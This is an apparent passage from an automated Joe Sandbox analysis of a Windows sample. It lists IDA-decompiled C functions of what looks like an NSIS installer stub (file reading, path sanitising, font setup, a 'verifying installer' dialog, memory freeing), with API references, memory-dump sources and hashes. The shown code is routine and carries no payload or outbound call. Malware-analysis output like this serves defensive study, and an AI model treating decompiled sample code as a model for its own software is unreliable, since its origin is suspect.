                                                                                                                        														__edi = __edi + 1;
                                                                                                                        														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                                                        														__eax = __ebp + 0xa;
                                                                                                                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                                                        															continue;
                                                                                                                        														} else {
                                                                                                                        															goto L21;
                                                                                                                        														}
                                                                                                                        														goto L22;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												L22:
                                                                                                                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                        													goto L28;
                                                                                                                        												} else {
                                                                                                                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                                                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                                                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                                                        														} else {
                                                                                                                        															__ecx =  *(__ebp - 0xc);
                                                                                                                        															__edx =  *(__ebp - 8);
                                                                                                                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                        														}
                                                                                                                        														goto L34;
                                                                                                                        													} else {
                                                                                                                        														__ecx =  *(__ebp - 0xc);
                                                                                                                        														__edx =  *(__ebp - 8);
                                                                                                                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                        														 *(__ebp - 0x38) = __eax;
                                                                                                                        														if(__ax == __bx) {
                                                                                                                        															goto L34;
                                                                                                                        														} else {
                                                                                                                        															goto L26;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L37;
                                                                                                                        								L26:
                                                                                                                        								__eax =  *(__ebp - 8);
                                                                                                                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                                                        						}
                                                                                                                        						goto L34;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L37:
                                                                                                                        				return 0;
                                                                                                                        			}








                                                                                                                        0x00402785
                                                                                                                        0x0040278b
                                                                                                                        0x00402797
                                                                                                                        0x00402801
                                                                                                                        0x00402801
                                                                                                                        0x00402799
                                                                                                                        0x00402799
                                                                                                                        0x0040279c
                                                                                                                        0x0040279e
                                                                                                                        0x0040279e
                                                                                                                        0x0040279e
                                                                                                                        0x004027a1
                                                                                                                        0x004027a6
                                                                                                                        0x004027a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004027ab
                                                                                                                        0x004027ae
                                                                                                                        0x004027bc
                                                                                                                        0x004027c2
                                                                                                                        0x004027d0
                                                                                                                        0x00000000
                                                                                                                        0x004027d2
                                                                                                                        0x00000000
                                                                                                                        0x004027d2
                                                                                                                        0x00000000
                                                                                                                        0x004027d0
                                                                                                                        0x0040279e
                                                                                                                        0x00402804
                                                                                                                        0x00402807
                                                                                                                        0x00000000
                                                                                                                        0x00402809
                                                                                                                        0x0040280e
                                                                                                                        0x0040284f
                                                                                                                        0x00402871
                                                                                                                        0x00402878
                                                                                                                        0x0040285d
                                                                                                                        0x0040285d
                                                                                                                        0x00402860
                                                                                                                        0x00402863
                                                                                                                        0x00402866
                                                                                                                        0x00402866
                                                                                                                        0x00000000
                                                                                                                        0x00402817
                                                                                                                        0x00402817
                                                                                                                        0x0040281a
                                                                                                                        0x0040281d
                                                                                                                        0x00402823
                                                                                                                        0x00402827
                                                                                                                        0x0040282a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040282a
                                                                                                                        0x0040280e
                                                                                                                        0x00402807
                                                                                                                        0x0040277f
                                                                                                                        0x0040276b
                                                                                                                        0x00402760
                                                                                                                        0x00000000
                                                                                                                        0x0040282c
                                                                                                                        0x0040282c
                                                                                                                        0x0040282f
                                                                                                                        0x00402838
                                                                                                                        0x00000000
                                                                                                                        0x0040272f
                                                                                                                        0x0040271a
                                                                                                                        0x00402c33
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                          • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                        • String ID: 9
                                                                                                                        • API String ID: 163830602-2366072709
                                                                                                                        • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                        • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                        • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                        • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E004067C4(WCHAR* _a4) {
                                                                                                                        				short _t5;
                                                                                                                        				short _t7;
                                                                                                                        				WCHAR* _t19;
                                                                                                                        				WCHAR* _t20;
                                                                                                                        				WCHAR* _t21;
                                                                                                                        
                                                                                                                        				_t20 = _a4;
                                                                                                                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                                        					_t20 =  &(_t20[4]);
                                                                                                                        				}
                                                                                                                        				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                                                                        					_t20 =  &(_t20[2]);
                                                                                                                        				}
                                                                                                                        				_t5 =  *_t20;
                                                                                                                        				_t21 = _t20;
                                                                                                                        				_t19 = _t20;
                                                                                                                        				if(_t5 != 0) {
                                                                                                                        					do {
                                                                                                                        						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                                                                        							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                                        							_t19 = CharNextW(_t19);
                                                                                                                        						}
                                                                                                                        						_t20 = CharNextW(_t20);
                                                                                                                        						_t5 =  *_t20;
                                                                                                                        					} while (_t5 != 0);
                                                                                                                        				}
                                                                                                                        				 *_t19 =  *_t19 & 0x00000000;
                                                                                                                        				while(1) {
                                                                                                                        					_push(_t19);
                                                                                                                        					_push(_t21);
                                                                                                                        					_t19 = CharPrevW();
                                                                                                                        					_t7 =  *_t19;
                                                                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					 *_t19 =  *_t19 & 0x00000000;
                                                                                                                        					if(_t21 < _t19) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				return _t7;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                        • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                        • CharNextW.USER32(?,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                        • CharPrevW.USER32(?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-2977677972
                                                                                                                        • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                        • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                        • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                        • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                        				long _v8;
                                                                                                                        				signed char _v12;
                                                                                                                        				unsigned int _v16;
                                                                                                                        				void* _v20;
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				long _v56;
                                                                                                                        				void* _v60;
                                                                                                                        				long _t15;
                                                                                                                        				unsigned int _t19;
                                                                                                                        				signed int _t25;
                                                                                                                        				struct HWND__* _t28;
                                                                                                                        
                                                                                                                        				_t28 = _a4;
                                                                                                                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                                        				if(_a8 == 0) {
                                                                                                                        					L4:
                                                                                                                        					_v56 = _t15;
                                                                                                                        					_v60 = 4;
                                                                                                                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                                        					return _v24;
                                                                                                                        				}
                                                                                                                        				_t19 = GetMessagePos();
                                                                                                                        				_v16 = _t19 >> 0x10;
                                                                                                                        				_v20 = _t19;
                                                                                                                        				ScreenToClient(_t28,  &_v20);
                                                                                                                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                                                                        					_t15 = _v8;
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        				return _t25 | 0xffffffff;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                        • GetMessagePos.USER32 ref: 00404E77
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                        • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                        • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E00401E4E(intOrPtr __edx) {
                                                                                                                        				void* __edi;
                                                                                                                        				int _t9;
                                                                                                                        				signed char _t15;
                                                                                                                        				struct HFONT__* _t18;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				void* _t31;
                                                                                                                        				struct HDC__* _t33;
                                                                                                                        				void* _t35;
                                                                                                                        
                                                                                                                        				_t30 = __edx;
                                                                                                                        				_t33 = GetDC( *(_t35 - 8));
                                                                                                                        				_t9 = E00402D84(2);
                                                                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                        				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                                                        				ReleaseDC( *(_t35 - 8), _t33);
                                                                                                                        				 *0x40ce00 = E00402D84(3);
                                                                                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                        				 *0x40ce07 = 1;
                                                                                                                        				 *0x40ce04 = _t15 & 0x00000001;
                                                                                                                        				 *0x40ce05 = _t15 & 0x00000002;
                                                                                                                        				 *0x40ce06 = _t15 & 0x00000004;
                                                                                                                        				E0040657A(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                                                        				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                                                                        				_push(_t18);
                                                                                                                        				_push(_t31);
                                                                                                                        				E00406484();
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401E51
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779
                                                                                                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                        • String ID: Tahoma
                                                                                                                        • API String ID: 2584051700-3580928618
                                                                                                                        • Opcode ID: 7613f5a947f4bbf8195753a17fba9eaca46e1d6fc564812dac8d5fa739d0f051
                                                                                                                        • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                        • Opcode Fuzzy Hash: 7613f5a947f4bbf8195753a17fba9eaca46e1d6fc564812dac8d5fa739d0f051
                                                                                                                        • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                        				short _v132;
                                                                                                                        				int _t11;
                                                                                                                        				int _t20;
                                                                                                                        
                                                                                                                        				if(_a8 == 0x110) {
                                                                                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                        					_a8 = 0x113;
                                                                                                                        				}
                                                                                                                        				if(_a8 == 0x113) {
                                                                                                                        					_t20 =  *0x41ea18; // 0x7306a
                                                                                                                        					_t11 =  *0x42aa24;
                                                                                                                        					if(_t20 >= _t11) {
                                                                                                                        						_t20 = _t11;
                                                                                                                        					}
                                                                                                                        					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                                        					SetWindowTextW(_a4,  &_v132);
                                                                                                                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                        • MulDiv.KERNEL32(0007306A,00000064,?), ref: 00402FDC
                                                                                                                        • wsprintfW.USER32 ref: 00402FEC
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                        • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                        • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                        • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 75%
                                                                                                                        			E70B22655() {
                                                                                                                        				intOrPtr _t24;
                                                                                                                        				void* _t26;
                                                                                                                        				intOrPtr _t27;
                                                                                                                        				signed int _t39;
                                                                                                                        				void* _t40;
                                                                                                                        				void* _t43;
                                                                                                                        				intOrPtr _t44;
                                                                                                                        				void* _t45;
                                                                                                                        
                                                                                                                        				_t40 = E70B212BB();
                                                                                                                        				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                                                        				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                                        				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                                                        				do {
                                                                                                                        					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                                                        					}
                                                                                                                        					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                                                        					if(_t39 <= 7) {
                                                                                                                        						switch( *((intOrPtr*)(_t39 * 4 +  &M70B22784))) {
                                                                                                                        							case 0:
                                                                                                                        								 *_t40 = 0;
                                                                                                                        								goto L17;
                                                                                                                        							case 1:
                                                                                                                        								__eax =  *__eax;
                                                                                                                        								if(__ecx > __ebx) {
                                                                                                                        									 *(__esp + 0x10) = __ecx;
                                                                                                                        									__ecx =  *(0x70b2407c + __edx * 4);
                                                                                                                        									__edx =  *(__esp + 0x10);
                                                                                                                        									__ecx = __ecx * __edx;
                                                                                                                        									asm("sbb edx, edx");
                                                                                                                        									__edx = __edx & __ecx;
                                                                                                                        									__eax = __eax &  *(0x70b2409c + __edx * 4);
                                                                                                                        								}
                                                                                                                        								_push(__eax);
                                                                                                                        								goto L15;
                                                                                                                        							case 2:
                                                                                                                        								__eax = E70B21510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                        								goto L16;
                                                                                                                        							case 3:
                                                                                                                        								__ecx =  *0x70b2506c;
                                                                                                                        								__edx = __ecx - 1;
                                                                                                                        								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                                                        								__eax =  *0x70b2506c;
                                                                                                                        								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                                                        								goto L17;
                                                                                                                        							case 4:
                                                                                                                        								__eax = lstrcpynW(__edi,  *__eax,  *0x70b2506c);
                                                                                                                        								goto L17;
                                                                                                                        							case 5:
                                                                                                                        								_push( *0x70b2506c);
                                                                                                                        								_push(__edi);
                                                                                                                        								_push( *__eax);
                                                                                                                        								__imp__StringFromGUID2();
                                                                                                                        								goto L17;
                                                                                                                        							case 6:
                                                                                                                        								_push( *__esi);
                                                                                                                        								L15:
                                                                                                                        								__eax = wsprintfW(__edi, 0x70b25000);
                                                                                                                        								L16:
                                                                                                                        								__esp = __esp + 0xc;
                                                                                                                        								goto L17;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L17:
                                                                                                                        					_t26 =  *(_t43 + 0x14);
                                                                                                                        					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                                        						GlobalFree(_t26);
                                                                                                                        					}
                                                                                                                        					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						if(_t27 != 0xffffffff) {
                                                                                                                        							if(_t27 > 0) {
                                                                                                                        								E70B21381(_t27 - 1, _t40);
                                                                                                                        								goto L26;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							E70B21312(_t40);
                                                                                                                        							L26:
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t44 = _t44 - 1;
                                                                                                                        					_t43 = _t43 - 0x20;
                                                                                                                        				} while (_t44 >= 0);
                                                                                                                        				return GlobalFree(_t40);
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                          • Part of subcall function 70B212BB: GlobalAlloc.KERNEL32(00000040,?,70B212DB,?,70B2137F,00000019,70B211CA,-000000A0), ref: 70B212C5
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70B22743
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70B22778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1780285237-0
                                                                                                                        • Opcode ID: 44d28b79067a70280e178de1755168ab81e6950737304a8a828c94a13fdabc48
                                                                                                                        • Instruction ID: 8b4446506f37803d1d4dac117e7459f5bc59623215f2c39466eb76a8f03c83a5
                                                                                                                        • Opcode Fuzzy Hash: 44d28b79067a70280e178de1755168ab81e6950737304a8a828c94a13fdabc48
                                                                                                                        • Instruction Fuzzy Hash: 4231AD72508101EFD7268F55EDD4D2E77FAFB893023244929F209C3631DB706E469B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00402950(int __ebx, void* __eflags) {
                                                                                                                        				WCHAR* _t26;
                                                                                                                        				void* _t29;
                                                                                                                        				long _t37;
                                                                                                                        				int _t49;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t54;
                                                                                                                        				void* _t56;
                                                                                                                        				void* _t59;
                                                                                                                        				void* _t60;
                                                                                                                        				void* _t61;
                                                                                                                        
                                                                                                                        				_t49 = __ebx;
                                                                                                                        				_t52 = 0xfffffd66;
                                                                                                                        				_t26 = E00402DA6(0xfffffff0);
                                                                                                                        				_t55 = _t26;
                                                                                                                        				 *(_t61 - 0x40) = _t26;
                                                                                                                        				if(E00405E83(_t26) == 0) {
                                                                                                                        					E00402DA6(0xffffffed);
                                                                                                                        				}
                                                                                                                        				E00406008(_t55);
                                                                                                                        				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                                                                        				 *(_t61 + 8) = _t29;
                                                                                                                        				if(_t29 != 0xffffffff) {
                                                                                                                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                                                        					if( *(_t61 - 0x28) != _t49) {
                                                                                                                        						_t37 =  *0x434f14;
                                                                                                                        						 *(_t61 - 0x44) = _t37;
                                                                                                                        						_t54 = GlobalAlloc(0x40, _t37);
